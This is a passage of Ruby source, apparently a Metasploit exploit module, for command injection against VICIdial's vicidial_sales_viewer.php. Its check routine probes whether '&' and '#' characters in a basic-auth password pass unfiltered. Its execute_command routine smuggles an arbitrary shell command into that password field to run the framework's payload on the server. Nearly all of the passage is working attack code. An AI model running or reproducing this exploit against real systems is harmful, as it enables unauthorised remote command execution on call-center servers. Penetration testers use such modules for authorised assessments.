    register_options([ OptString.new('TARGETURI', [true, 'The base path to VICIdial', '/vicidial/']) ])
    deregister_options('USERNAME', 'PASSWORD')
  end

  def check
    user = rand_text_alpha(rand(10) + 5)
    pass = "#{rand_text_alpha(rand(10) + 5)}&#"
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
                           'authorization' => basic_auth(user, pass)

    unless res
      vprint_status 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code != 401
      vprint_status "#{peer} Unexpected reply. Expected authentication failure."
      return CheckCode::Safe
    end

    # Check for input filtering of '#' and '&' characters in password
    # Response for invalid credentials is in the form of: |<username>|<password>|BAD|
    if res.body !~ /\|#{user}\|#{pass}\|BAD\|/
      vprint_status "#{peer} Target is patched."
      return CheckCode::Safe
    end

    # Check for ../agc/bp.pl password encryption script
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '..', 'agc', 'bp.pl')
    if res && res.code == 200 && res.body =~ /Bcrypt password hashing script/
      vprint_status "#{peer} Password encryption is supported, but may not be enabled."
      return CheckCode::Appears
    end

    vprint_status "#{peer} Could not verify whether password encryption is supported."
    CheckCode::Detected
  end

  def execute_command(cmd, opts = {})
    user = rand_text_alpha(rand(10) + 5)
    pass = "#{rand_text_alpha(rand(10) + 5)}& #{cmd} #"

    print_status "#{peer} Sending payload (#{cmd.length} bytes)"
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'vicidial_sales_viewer.php'),
                           'authorization' => basic_auth(user, pass)

    if !res
      fail_with(Failure::Unreachable, 'Connection failed')
    elsif res.code == 401 && res.body =~ /#{user}/ && res.body =~ /BAD/
      print_good "#{peer} Payload sent successfully"
    else
      fail_with(Failure::UnexpectedReply, 'Unexpected reply')
    end
  end

  def exploit
    execute_command(payload.encoded)
  end
end